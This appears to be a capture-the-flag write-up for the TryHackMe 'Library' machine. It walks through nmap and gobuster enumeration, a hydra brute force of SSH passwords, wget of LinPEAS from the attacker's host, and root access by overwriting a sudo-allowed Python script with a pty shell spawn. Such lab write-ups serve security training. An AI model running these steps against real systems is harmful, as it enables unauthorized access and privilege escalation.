Library

boot2root machine for FIT and bsides guatemala CTF

TryHackMe | Library

A beginner level easy Capture The Flag(CTF) that challenges beginners to solve variety of tasks using available tools and hacking into a server to steal data. In this post, a course task from HackerU : RED Team Pentester, I will show the steps followed to get the flag.

Basic Checks to be performed before attacking the machine.

1.Power on the Target Machine and make a note of the IP address.

2.Start your Kali Virtual Machine.

3.Connect to TRY HACK ME OPEN VPN

# sudo openvpn <vpn-file-name>

Step 1

NMAP (NETWORK MAP) -Enumeration

Let’s start with nmap scan

# nmap -A -sCV -Pn — reason <Target IP>

Only HTTP and SSH services are open.

Step 2

Let us check the HTTP services. Open your favourite browser and type the IP address of the target machine.

Web page blog is displayed and you can see the blog post written by an author M*** .

View page source does not reveal much information.

Step 3

Let us perfrom a directory search

gobuster dir -u http://<Target Machine IP> -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x .php,.txt,.html — timeout 60s

gobuster reveals some directories and an interesting directory is ‘robotos.txt’. There is nothing useful but what catches attention is the word “r*****u”.txt.

Step 4

Let us use hydra to brute force the password for the blogs written by the author and protocol will be ssh. From nmap scan , discovered open ports was SSH and HTTP.

# hydra -l <usernmae> -P /usr/share/wordlists/rockyou.txt ssh://Target Machine IP/

# password found

Step 5

Let us SSH into the target machine with the password

# ssh <username>@<Target Machine IP>

After entering the password, BOOM!!! , got access. We need to find the user flag.

As a good practice type the following commands and

whoami : Shows the current user when the command is invoked.

id: Find out the user and group names. If you get (1000) it means normal user and the user do not have root access.

Type “ls -ltr” and you can find the first flag user.txt.

# ls -ltr && cat user.txt

Step 6

From the earlier command , “ls -ltr” , noticed two files. One was the flag and another was <something>.py. If you observe closely the <something.py> can be run as root only.

The initial shell is normal access and the current user does not have root privileges.

Let us try uploading LINPEAS.sh into Target Machine. In your attacker machine, navigate to the directory where LINPEAS is located.

In the terminal type “python3 -m http.server 9000”

Go to target machine ip , terminal and type

wget http://<Attacker Kali IP>:<port>/linepeash.sh

Once the file is uploaded successfully into the target machine. Check the permission of the uploaded file “ls -ltr”.

Set the permission for linpeas.sh using the command

chmod +x linpeas.sh

Let us run the linpeas.sh # ./ linpeas.sh.

After linepeas is completed , you will have to scroll the output and find out if there is anything interesting that can be used to gain root access.

Anything in RED , must take a look. You can find root files in the home directory of the user where we got the shell. The file name is bak.py.

The understanding is that the user M***** can run bak.py without password.

In the terminal of the target machine enter sudo -l

# sudo -l

The current user should be able to execute bak.py and with the privilege escaltion , capture the root flag.

First remove the bak.py from the current user path.

Create a file # touch bak.py

Use default linux editor # nano bak.py

Add the following lines in bak.py

‘import pty;pty.spawn(“/bin/bash”)’

{or}

echo ‘import pty;pty.spawn(“/bin/bash”)’ > bak.py

Set permission for bak.py and do not forget.

# chmod +777 bak.py

To get the root shell, type the entire path. If you refer to sudo -l output.

# sudo /usr/bin/python /home/meliodas/bak.py

# Navigate to directory root and root.txt is the flag.

That’s it folks. Happy hacking!!!